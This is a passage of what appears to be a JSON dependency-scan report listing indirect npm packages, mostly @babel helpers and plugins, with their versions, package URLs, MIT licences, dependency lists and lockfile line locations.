"@babel/helper-plugin-utils@7.27.1", "debug@4.4.3", "lodash.debounce@4.0.8", "resolve@1.22.10" ], "Locations": [ { "StartLine": 293, "EndLine": 308 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-globals@7.28.0", "Name": "@babel/helper-globals", "Identifier": { "PURL": "pkg:npm/%40babel/helper-globals@7.28.0", "UID": "341c17d8edbdbddd" }, "Version": "7.28.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 309, "EndLine": 317 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-member-expression-to-functions@7.27.1", "Name": "@babel/helper-member-expression-to-functions", "Identifier": { "PURL": "pkg:npm/%40babel/helper-member-expression-to-functions@7.27.1", "UID": "69c0a3a6166a4ba6" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/traverse@7.28.4", "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 318, "EndLine": 330 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-module-imports@7.27.1", "Name": "@babel/helper-module-imports", "Identifier": { "PURL": "pkg:npm/%40babel/helper-module-imports@7.27.1", "UID": "7066e6d04254ba4c" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/traverse@7.28.4", "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 331, "EndLine": 343 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-module-transforms@7.28.3", "Name": "@babel/helper-module-transforms", "Identifier": { "PURL": "pkg:npm/%40babel/helper-module-transforms@7.28.3", "UID": "2eb8aa43d3876a3c" }, "Version": "7.28.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-module-imports@7.27.1", "@babel/helper-validator-identifier@7.27.1", "@babel/traverse@7.28.4" ], "Locations": [ { "StartLine": 344, "EndLine": 360 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-optimise-call-expression@7.27.1", "Name": "@babel/helper-optimise-call-expression", "Identifier": { "PURL": "pkg:npm/%40babel/helper-optimise-call-expression@7.27.1", "UID": "22b8065609d21e1f" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 361, "EndLine": 372 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-plugin-utils@7.27.1", "Name": "@babel/helper-plugin-utils", "Identifier": { "PURL": "pkg:npm/%40babel/helper-plugin-utils@7.27.1", "UID": "ae35ce14a335f2ef" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 373, "EndLine": 381 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-remap-async-to-generator@7.27.1", "Name": "@babel/helper-remap-async-to-generator", "Identifier": { "PURL": "pkg:npm/%40babel/helper-remap-async-to-generator@7.27.1", "UID": "e6f80da9a1325482" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-annotate-as-pure@7.27.3", "@babel/helper-wrap-function@7.28.3", "@babel/traverse@7.28.4" ], "Locations": [ { "StartLine": 382, "EndLine": 398 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-replace-supers@7.27.1", "Name": "@babel/helper-replace-supers", "Identifier": { "PURL": "pkg:npm/%40babel/helper-replace-supers@7.27.1", "UID": "8b6ed2d0bfc05e64" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-member-expression-to-functions@7.27.1", "@babel/helper-optimise-call-expression@7.27.1", "@babel/traverse@7.28.4" ], "Locations": [ { "StartLine": 399, "EndLine": 415 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-skip-transparent-expression-wrappers@7.27.1", "Name": "@babel/helper-skip-transparent-expression-wrappers", "Identifier": { "PURL": "pkg:npm/%40babel/helper-skip-transparent-expression-wrappers@7.27.1", "UID": "4b9b027d36fee93b" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/traverse@7.28.4", "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 416, "EndLine": 428 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-string-parser@7.27.1", "Name": "@babel/helper-string-parser", "Identifier": { "PURL": "pkg:npm/%40babel/helper-string-parser@7.27.1", "UID": "d00ff65b3b5bf173" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 429, "EndLine": 437 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-validator-identifier@7.27.1", "Name": "@babel/helper-validator-identifier", "Identifier": { "PURL": "pkg:npm/%40babel/helper-validator-identifier@7.27.1", "UID": "a7c7d00a2fb7f604" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 438, "EndLine": 446 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-validator-option@7.27.1", "Name": "@babel/helper-validator-option", "Identifier": { "PURL": "pkg:npm/%40babel/helper-validator-option@7.27.1", "UID": "4a4b649d45522d62" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 447, "EndLine": 455 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-wrap-function@7.28.3", "Name": "@babel/helper-wrap-function", "Identifier": { "PURL": "pkg:npm/%40babel/helper-wrap-function@7.28.3", "UID": "c2ab0566b37a5752" }, "Version": "7.28.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/template@7.27.2", "@babel/traverse@7.28.4", "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 456, "EndLine": 469 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helpers@7.28.4", "Name": "@babel/helpers", "Identifier": { "PURL": "pkg:npm/%40babel/helpers@7.28.4", "UID": "3c2db9a6648eea62" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/template@7.27.2", "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 470, "EndLine": 482 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/highlight@7.25.9", "Name": "@babel/highlight", "Identifier": { "PURL": "pkg:npm/%40babel/highlight@7.25.9", "UID": "3edb21cca92ecea8" }, "Version": "7.25.9", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-validator-identifier@7.27.1", "chalk@2.4.2", "js-tokens@4.0.0", "picocolors@1.1.1" ], "Locations": [ { "StartLine": 483, "EndLine": 497 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/parser@7.28.4", "Name": "@babel/parser", "Identifier": { "PURL": "pkg:npm/%40babel/parser@7.28.4", "UID": "41ade695d8989ffd" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 569, "EndLine": 583 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-proposal-export-default-from@7.27.1", "Name": "@babel/plugin-proposal-export-default-from", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-proposal-export-default-from@7.27.1", "UID": "8ac0d6e80d9158dd" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 668, "EndLine": 682 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-async-generators@7.8.4", "Name": "@babel/plugin-syntax-async-generators", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-async-generators@7.8.4", "UID": "3bc405b13deb38e9" }, "Version": "7.8.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 696, "EndLine": 707 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-bigint@7.8.3", "Name": "@babel/plugin-syntax-bigint", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-bigint@7.8.3", "UID": "cd46640de32c6b1" }, "Version": "7.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 708, "EndLine": 719 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-class-properties@7.12.13", "Name": "@babel/plugin-syntax-class-properties", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-class-properties@7.12.13", "UID": "4c758f7ad88e8c83" }, "Version": "7.12.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 720, "EndLine": 731 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-class-static-block@7.14.5", "Name": "@babel/plugin-syntax-class-static-block", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-class-static-block@7.14.5", "UID": "8ba30823ef0e4351" }, "Version": "7.14.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 732, "EndLine": 746 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-dynamic-import@7.8.3", "Name": "@babel/plugin-syntax-dynamic-import", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-dynamic-import@7.8.3", "UID": "70d70d9e6b7c0bc0" }, "Version": "7.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 747, "EndLine": 758 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-export-default-from@7.27.1", "Name": "@babel/plugin-syntax-export-default-from", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-export-default-from@7.27.1", "UID": "2319e75330626f6b" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 759, "EndLine": 773 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-flow@7.27.1", "Name": "@babel/plugin-syntax-flow", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-flow@7.27.1", "UID": "871d8972eec5202a" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 774, "EndLine": 788 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-import-attributes@7.27.1", "Name": "@babel/plugin-syntax-import-attributes", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-import-attributes@7.27.1", "UID": "73d8e2829cb4e9e0" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 805, "EndLine": 819 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-import-meta@7.10.4", "Name": "@babel/plugin-syntax-import-meta", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-import-meta@7.10.4", "UID": "d57d9d31902770cc" }, "Version": "7.10.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 820, "EndLine": 831 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-json-strings@7.8.3", "Name": "@babel/plugin-syntax-json-strings", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-json-strings@7.8.3", "UID": "71c09c113d3d540d" }, "Version": "7.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 832, "EndLine": 843 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-jsx@7.27.1", "Name": "@babel/plugin-syntax-jsx", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-jsx@7.27.1", "UID": "af3d9146c89269d3" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 844, "EndLine": 858 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-logical-assignment-operators@7.10.4", "Name": "@babel/plugin-syntax-logical-assignment-operators", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-logical-assignment-operators@7.10.4", "UID": "2354164d55e6366e" }, "Version": "7.10.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 859, "EndLine": 870 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-nullish-coalescing-operator@7.8.3", "Name": "@babel/plugin-syntax-nullish-coalescing-operator", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-nullish-coalescing-operator@7.8.3", "UID": "85eca95fef5f56af" }, "Version": "7.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 871, "EndLine": 882 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-numeric-separator@7.10.4", "Name": "@babel/plugin-syntax-numeric-separator", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-numeric-separator@7.10.4", "UID": "d5396b912967f1c6" }, "Version": "7.10.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 883, "EndLine": 894 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-object-rest-spread@7.8.3", "Name": "@babel/plugin-syntax-object-rest-spread", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-object-rest-spread@7.8.3", "UID": "fb61881c37ff1f05" }, "Version": "7.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 895, "EndLine": 906 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-optional-catch-binding@7.8.3", "Name": "@babel/plugin-syntax-optional-catch-binding", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-optional-catch-binding@7.8.3", "UID": "24b2183560dcc639" }, "Version": "7.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 907, "EndLine": 918 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-optional-chaining@7.8.3", "Name": "@babel/plugin-syntax-optional-chaining", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-optional-chaining@7.8.3", "UID": "9973ece2ac77ed6c" }, "Version": "7.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 919, "EndLine": 930 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-private-property-in-object@7.14.5", "Name": "@babel/plugin-syntax-private-property-in-object", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-private-property-in-object@7.14.5", "UID": "5ff34ad9e0873373" }, "Version": "7.14.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 931, "EndLine": 945 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-top-level-await@7.14.5", "Name": "@babel/plugin-syntax-top-level-await", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-top-level-await@7.14.5", "UID": "29fd317949961f26" }, "Version": "7.14.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 946, "EndLine": 960 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-syntax-typescript@7.27.1", "Name": "@babel/plugin-syntax-typescript", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-typescript@7.27.1", "UID": "1a7ee64ffb2163bf" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 961, "EndLine": 975 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-arrow-functions@7.27.1", "Name": "@babel/plugin-transform-arrow-functions", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-arrow-functions@7.27.1", "UID": "b3fdd8c204978a7a" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 993, "EndLine": 1007 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-async-generator-functions@7.28.0", "Name": "@babel/plugin-transform-async-generator-functions", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-async-generator-functions@7.28.0", "UID": "e7c80934d1ab9af3" }, "Version": "7.28.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1", "@babel/helper-remap-async-to-generator@7.27.1", "@babel/traverse@7.28.4" ], "Locations": [ { "StartLine": 1008, "EndLine": 1024 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-async-to-generator@7.27.1", "Name": "@babel/plugin-transform-async-to-generator", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-async-to-generator@7.27.1", "UID": "9b30e387ffb4111c" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-module-imports@7.27.1", "@babel/helper-plugin-utils@7.27.1", "@babel/helper-remap-async-to-generator@7.27.1" ], "Locations": [ { "StartLine": 1025, "EndLine": 1041 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-block-scoping@7.28.4", "Name": "@babel/plugin-transform-block-scoping", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-block-scoping@7.28.4", "UID": "dff90ba76c99318d" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1058, "EndLine": 1072 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-class-properties@7.27.1", "Name": "@babel/plugin-transform-class-properties", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-class-properties@7.27.1", "UID": "f22d9847c666198f" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-create-class-features-plugin@7.28.3", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1073, "EndLine": 1088 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-classes@7.28.4", "Name": "@babel/plugin-transform-classes", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-classes@7.28.4", "UID": "dc05b671165003f3" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-annotate-as-pure@7.27.3", "@babel/helper-compilation-targets@7.27.2", "@babel/helper-globals@7.28.0", "@babel/helper-plugin-utils@7.27.1", "@babel/helper-replace-supers@7.27.1", "@babel/traverse@7.28.4" ], "Locations": [ { "StartLine": 1106, "EndLine": 1125 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-computed-properties@7.27.1", "Name": "@babel/plugin-transform-computed-properties", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-computed-properties@7.27.1", "UID": "93f466e81d4fd028" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1", "@babel/template@7.27.2" ], "Locations": [ { "StartLine": 1126, "EndLine": 1141 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-destructuring@7.28.0", "Name": "@babel/plugin-transform-destructuring", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-destructuring@7.28.0", "UID": "f2be2d351671f660" }, "Version": "7.28.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1", "@babel/traverse@7.28.4" ], "Locations": [ { "StartLine": 1142, "EndLine": 1157 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-flow-strip-types@7.27.1", "Name": "@babel/plugin-transform-flow-strip-types", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-flow-strip-types@7.27.1", "UID": "a6d93a53aff4957a" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1", "@babel/plugin-syntax-flow@7.27.1" ], "Locations": [ { "StartLine": 1273, "EndLine": 1288 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-for-of@7.27.1", "Name": "@babel/plugin-transform-for-of", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-for-of@7.27.1", "UID": "f4cf06cd872a3346" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1", "@babel/helper-skip-transparent-expression-wrappers@7.27.1" ], "Locations": [ { "StartLine": 1289, "EndLine": 1304 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-function-name@7.27.1", "Name": "@babel/plugin-transform-function-name", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-function-name@7.27.1", "UID": "9ad7eea2f3811df" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-compilation-targets@7.27.2", "@babel/helper-plugin-utils@7.27.1", "@babel/traverse@7.28.4" ], "Locations": [ { "StartLine": 1305, "EndLine": 1321 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-literals@7.27.1", "Name": "@babel/plugin-transform-literals", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-literals@7.27.1", "UID": "3710dd6d53e044a9" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1338, "EndLine": 1352 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-logical-assignment-operators@7.27.1", "Name": "@babel/plugin-transform-logical-assignment-operators", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-logical-assignment-operators@7.27.1", "UID": "855af678331c3e2a" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1353, "EndLine": 1367 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-modules-commonjs@7.27.1", "Name": "@babel/plugin-transform-modules-commonjs", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-modules-commonjs@7.27.1", "UID": "71c1125877361fd0" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-module-transforms@7.28.3", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1401, "EndLine": 1416 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-named-capturing-groups-regex@7.27.1", "Name": "@babel/plugin-transform-named-capturing-groups-regex", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-named-capturing-groups-regex@7.27.1", "UID": "7b629e343537de35" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-create-regexp-features-plugin@7.27.1", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1453, "EndLine": 1468 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-nullish-coalescing-operator@7.27.1", "Name": "@babel/plugin-transform-nullish-coalescing-operator", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-nullish-coalescing-operator@7.27.1", "UID": "de0f669f0889b1d4" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1485, "EndLine": 1499 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-numeric-separator@7.27.1", "Name": "@babel/plugin-transform-numeric-separator", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-numeric-separator@7.27.1", "UID": "51b5bc33baecad24" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1500, "EndLine": 1514 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-object-rest-spread@7.28.4", "Name": "@babel/plugin-transform-object-rest-spread", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-object-rest-spread@7.28.4", "UID": "a47c3fb199438136" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-compilation-targets@7.27.2", "@babel/helper-plugin-utils@7.27.1", "@babel/plugin-transform-destructuring@7.28.0", "@babel/plugin-transform-parameters@7.27.7", "@babel/traverse@7.28.4" ], "Locations": [ { "StartLine": 1515, "EndLine": 1533 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-optional-catch-binding@7.27.1", "Name": "@babel/plugin-transform-optional-catch-binding", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-optional-catch-binding@7.27.1", "UID": "a5294f34c408665d" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1551, "EndLine": 1565 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-optional-chaining@7.27.1", "Name": "@babel/plugin-transform-optional-chaining", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-optional-chaining@7.27.1", "UID": "b2981d7243865474" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1", "@babel/helper-skip-transparent-expression-wrappers@7.27.1" ], "Locations": [ { "StartLine": 1566, "EndLine": 1581 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-parameters@7.27.7", "Name": "@babel/plugin-transform-parameters", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-parameters@7.27.7", "UID": "3cdf34d84623944d" }, "Version": "7.27.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1582, "EndLine": 1596 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-private-methods@7.27.1", "Name": "@babel/plugin-transform-private-methods", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-private-methods@7.27.1", "UID": "db16d41bb7a81c56" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ 